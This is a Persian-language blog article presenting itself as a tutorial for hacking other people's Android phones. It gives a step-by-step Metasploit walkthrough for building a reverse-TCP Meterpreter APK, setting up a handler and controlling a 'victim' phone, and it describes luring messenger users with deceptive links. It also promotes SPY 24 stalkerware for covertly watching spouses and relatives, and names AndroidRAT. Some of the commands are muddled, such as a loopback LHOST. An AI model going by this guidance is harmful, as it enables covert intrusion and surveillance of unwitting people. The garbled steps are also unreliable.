امنیت شبکه و هکبرنامه هکردیابی گوشینرم افزار کنترل والدینهک گوشی

آموزش هک گوشی اندروید با متاسپلویت

هک گوشی اندروید با متاسپلویت و یا سایر روش های ممکن، موضوعی است که قصد داریم در این مقاله به طور مفصل به آن بپردازیم. در حقیقت امروزه با توجه به نیاز مبرم انسان ها به گوشی هوشمند، این دستگاه یک منبع اساسی برای اطلاعات شخصی و محرمانه آن ها به شمار آمده و از همین رو عده ای با قصد و نیت خاص سعی دارند هر طور که شده به این اطلاعات نفوذ و دسترسی پیدا کنند؛ یکی از روش ها هک گوشی اندروید با متاسپلویت است که در ادامه بیشتر به این موضوع خواهیم پرداخت.

هک گوشی اندروید با متاسپلویت

منظور از هک (Hack) چیست؟

هک (Hack) اصطلاحی تخصصی در حوزه علوم کامپیوتر است که به اقدامات خرابکارانه و جاسوسی افراد برای دستیابی به اطلاعات شخصی و محرمانه سایرین بدون اطلاع و آگاهی خود آنان نسبت داده می شود. فرایند هک کردن یک دستگاه یا برنامه بسیار پیچیده و دشوار می باشد و برای انجام این کار به دانش و مهارت خاصی در زمینه کد نویسی نیاز است. البته افراد مبتدی نیز بدون نیاز به هیچگونه دانش و تخصصی در این زمینه می توانند تنها با کمک ابزار و برنامه هایی که برای هک گوشی و … طراحی شده است به اطلاعات دیگران دست پیدا کنند.

آیا هک گوشی اندروید با متاسپلویت و … امکان پذیر است؟

سوالی که عموما ذهن بسیاری از افراد را به خود مشغول کرده، این است که علی رغم وجود پروتکل های امنیتی که شرکت های تولید کننده برای مدل های مختلف گوشی همراه خود در نظر گرفته اند، آیا امکان هک گوشی اندروید با متاسپلویت و دیگر ابزار و روش ها امکان پذیر است یا خیر؟ در پاسخ به این سوال باید گفت که گوشی های اندرویدی نسبت به آیفون از نظر امنیتی در مرتبه پایین تری قرار می گیرند و بخاطر اپن سورس بودن سرور اندروید امکان دسترسی و نفوذ افراد سودجو به اطلاعات شخصی و محرمانه افراد دور از انتظار نیست. در حقیقت آن ها بر حسب دانش خود در زمینه کد نویسی و یا با کمک برنامه ها و ابزارهای مختلف می توانند به راحتی برای هک گوشی های اندرویدی اقدام نمایند. البته این اتفاق بیشتر به خاطر غفلت کاربران و فریب خوردن آن ها اتفاق می افتد و باید توجه داشت که بسیاری از ربات ها و برنامه هایی که در فضای مجازی تحت عنوان هک گوشی های اندروید و آیفون منتشر شده است؛ خود از جمله برنامه های جاسوسی هستند که با وسوسه افراد نسبت به انجام این کار آنها را فریب داده و با مقاصد خاص خود به اطلاعات آن دسترسی پیدا می کنند.

هک گوشی اندروید با متاسپلویت

انواع ابزار و شیوه های مختلف هک گوشی اندروید

همانطور که اشاره شد؛ با کمک قابلیت ها و امکانات منحصر به فردی که برای برخی از برنامه های جاسوسی و هک در نظر گرفته شده و یا با اطلاع از دانش کد نویسی میتوان خیلی راحت به اطلاعات مهم، حساس و محرمانه افراد که در برنامه ها و بخش های مختلف گوشی اندروید آن ها ذخیره شده، دست پیدا کرد. در ادامه قصد پرداختن به چند برنامه و شیوه های مختلف هک گوشی اندروید با متاسپلویت و … را داریم :

هک گوشی اندروید با متاسپلویت

– هک گوشی اندروید با متاسپلویت

یکی از بهترین راهکارهای ممکن جهت نفوذ و دسترسی به اطلاعات دیگران، هک گوشی اندروید با متاسپلویت است. این شیوه هک که از طریق لینک صورت گرفته و به محض ورود افراد به لینک مورد نظر تمام اطلاعات مهم و حساس آن ها در اختیار فرد هکر قرار می گیرد. قبل از پرداختن به شیوه هک گوشی اندروید با متاسپلویت شاید بد نباشد که اطلاعاتی را در خصوص تاریخچه این روش با شما به اشتراک بگذاریم. نخستین نسخه متاسپلویت ها توسط  HD Moore در سال 2003 میلادی به زبان پرل نوشته شد و این نسخه بر اساس curses از یک رابط گرافیکی برخوردار می باشد. نسخه دوم ابزار هک گوشی با متاسپلویت توسط میلر و چند داوطلب دیگر نگاشته شد و به همین ترتیب با هدف رفع باگ های ورژن قبلی، نسخه سوم متاسپلویت توسط Metasploit, LLC به زبان روبی در سال 2006 میلادی مورد بازنویسی قرار گرفت.

هک گوشی اندروید با متاسپلویت

بعد از انتشار سومین نسخه متاسپلویت ها؛  چارچوب اختصاصی مجوز متاسپلویت ها حدود سال 2008 میلادی به حالت BSD تغییر حالت داد. بعد از محبوبیت متاسپلویت ها، شرکت Rapid7 در سال 2009 میلادی، خبر از انتشار نسخه جدید این برنامه در قالب یک منبع باز بسته دو منظوره برای انجام تست های نفوذ غیر تجاری داد که به طور عمومی برای همه کاربران قابل دسترس است.

– آموزش هک گوشی اندروید با متاسپلویت

هک گوشی اندروید با متاسپلویت به وسیله سیستم عامل کالی لینوکس مورد تست و بررسی قرار گرفته و علاوه بر این با کمک برنامه هایی نظیر  termux نیز میتوان از قابلیت ها و امکانات این ابزار جاسوسی بهره کافی را برد. آموزش هک اندروید با متاسپلویت کمی پیچیده و دشوار به نظر می رسد و برای انجام این کار نیاز به دانش کافی در زمینه کد نویسی یا همان برنامه نویسی خواهید داشت تا با ایجاد و ساخت یک لینک جعلی تحت عناوین فریبنده، کاربران کانال و گروه های مختلف پیام رسان های مختلف اجتماعی را وسوسه کرده و اطلاعات مهم و حساس آن را به سرقت ببرند.

هک گوشی اندروید با متاسپلویت

به طور کلی متاسپلویت ها یک نوع فریم ورک قدرتمند به حساب می آیند که به منظور تست نفوذ به سیستم عامل های مختلف نظیر اندروید به کار گرفته می شود. این ابزار را میتوان به راحتی بر روی هر نوع سیستم عاملی نظیر ویندوز و … نصب و اجرا کرد اما کالی لینوکس به صورت پیش فرض از این ابزار برخوردار بوده و به همین دلیل در بین افراد علاقمند به هک گوشی اندروید با متاسپلویت محبوبیت بسیاری دارد. فیلم های آموزشی بسیاری برای هک گوشی اندروید با متاسپلویت در اینترنت وجود دارد که میتوان به راحتی با تماشای آن ها یک فایل تست نفوذ و یا امنیت برای هک اندروید ایجاد کنیم.

– گام های تست نفوذ اندروید با متاسپلویت

در این بخش مراحل و گام هایی که هر یک از کاربران برای هک گوشی اندروید با متاسپلویت باید در سیستم عامل کالی لینوکس به ترتیب پشت سر بگذارند؛ به شرح موارد مطرح شده در قسمت ذیل به صورت خلاصه و مفید بیان شده است :

هک گوشی اندروید با متاسپلویت

– گام اول : ورود به صفحه متاسپلویت با دستور msfconsole

– گام دوم : ساخت  apk با وارد کردن دستور use android/meterpreter/reverse_tcp

– گام سوم : تنظیمات مربوط به پیلود با وارد کردن دستور مرتبط با آن همراه با ای پی سرور خود

( نکته : در صورت عدم استفاده از آی پی سرور لازم است که یک آی پی ثابت برای سیستم خود در نظر گرفته و سپس مراحل پورت فورواردینگ را پشت سر بگذارید).

– گام چهارم : انتخاب set LHOST 127.0.0.1 و یک پورت برای اتصال

– گام پنجم : وارد کردن دستور generate -f raw -o PentestCore.apk  برای ساخت فایل اصلی هک گوشی اندروید با متاسپلویت

– گام ششم : وارد کردن دستور  use multi/handler به منظور ایجاد اتصال بین پیلود و ست آن مطابق آدرس وارد شده در دستور اول (set PAYLOAD android/meterpreter/reverse_tcp )

– گام هفتم : انجام تنظیمات مجدد  آی پی و پورت همانند روال گذشته

– گام هشتم : وارد کردن دستور exploit به منظور نصب اپ اندروید و اجازه دسترسی meterpreter به کاربر

گام نهم : استفاده از کلیه امکانات و قابلیت های متاسپلویت در سیستم عامل اندروید شخص قربانی

– برنامه هک گوشی اندروید SPY 24

بسیاری از کاربران برای زیر نظر گرفتن اعمال و رفتار دوستان و نزدیکان خود در استفاده از برنامه های مختلف گوشی های اندرویدی و یا به منظور دسترسی به اطلاعات شخصی و محرمانه آنها به سمت برنامه ها و ابزارهای جاسوسی نظیر برنامه SPY 24 روی می آورند. این برنامه با وجود قابلیت ها و امکانات منحصر به فرد خود یک نوع سامانه نظارتی برای خانواده ها و زوجینی محسوب می شود که بنا بر هر دلیلی قصد دارند تا وضعیت و موقعیت اطرافیان خود را با استفاده از گوشی همراه آن ها زیر نظر و کنترل داشته باشند. برای بهره مندی از قابلیت های برنامه یاد شده، تنها کافی است که اکانتی را برای خود در وبسایت رسمی این برنامه ایجاد کرده و سپس بعد از دانلود نرم افزار، آن را بر روی گوشی شخص قربانی یا خود ( در صورت داشتن شناسه گوشی) نصب نماید. به این ترتیب کلیه بخش ها، برنامه ها و اطلاعات گوشی شخص قربانی توسط شخص هکر از راه دور و بدون آگاهی او تحت نظارت و کنترل قرار خواهد داشت.

هک گوشی اندروید با متاسپلویت

– برنامه هک گوشی اندروید AndroidRAT

هک کردن گوشی اندروید با ابزار و برنامه های متنوع دیگری بجز متاسپلویت و SPY 24  نیز انجام می گیرد که از جمله این برنامه ها، AndroidRAT می باشد. این برنامه یک ابزار جاسوسی بسیار قدرتمند و کاربردی است که به کاربران این امکان را می دهد تا از راه دور و بدون آگاهی شخص قربانی به اطلاعات و داده های ذخیره شده در گوشی اندروید آن دست پیدا کنند.

هک گوشی اندروید با متاسپلویت

– راه های پیشگیری از هک گوشی اندروید با متاسپلویت

بخشی از راه های ارتقای امنیت و پیشگیری از نفوذ افراد هکر با کمک ابزار متاسپلویت و دیگر برنامه ها و ابزارهای ممکن در این بخش به صورت خلاصه و تیتروار برای شما خوانندگان عزیز آورده شده است :

– نصب آنتی ویروس های به روز و اورجینال

– عدم باز کردن لینک های ناشناخته با عناوین فریبنده در کانال و یا گروه ها

– پرهیز از دانلود برنامه هایی با منبع تایید نشده توسط سیستم عامل اندروید

– انتخاب یک پسورد پیچیده و غیر قابل حدس برای سایرین

– انجام تست نفوذ بر روی دستگاه خود با استفاده از کالی لینوکس

– و ….

کلیس آندره

کلیس آندره، نامی که در دنیای امنیت شبکه به عنوان یک نویسنده و پژوهشگر برجسته شناخته می‌شود. او با انگیزه و تعهد عمیق به حفظ امنیت در دنیای دیجیتال، در حال تألیف مقالاتی برای وب‌سایت‌ها و منابع تخصصی می‌باشد. تخصص اصلی کلیس آندره در زمینه امنیت شبکه و فناوری‌های اطلاعاتی قرار دارد. او با داشتن دانش گسترده‌ای در مباحث مختلف امنیت شبکه از جمله رمزنگاری، نفوذ و تشخیص تهدیدات، توانسته است مقالاتی با محتوای غنی و عمیق تولید کند. با تجربه‌های متعدد و تحقیقات گسترده در زمینه امنیت شبکه، کلیس توانسته است راهکارها و راهنماهای مؤثری را برای مدیران سیستم، توسعه‌دهندگان نرم‌افزار و افراد علاقه‌مند به امنیت دیجیتال ارائه دهد. مقالات او به عنوان منابع معتبر در زمینه امنیت شبکه شناخته می‌شوند. با زبانی ساده و قابل فهم، کلیس توانسته است مفاهیم پیچیده امنیت شبکه را برای عموم مخاطبان تبیین کند. او با تمرکز بر راه‌حل‌های عملی و نکات کلیدی، مخاطبان را در جهت تقویت امنیت شبکه‌های خود هدایت می‌کند. با توجه به تلاش‌های فراوان کلیس آندره در ارتقاء امنیت دیجیتال، مقالات وی به عنوان راهنماهای مهم و ضروری در دنیای پیچیده و پرخطر امنیت شبکه به شمار می‌آیند. او با تأکید بر آگاهی و آموزش، به ارتقاء امنیت دیجیتال جامعه کمک می‌کند و نقش مهمی در این زمینه ایفا می‌نماید.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا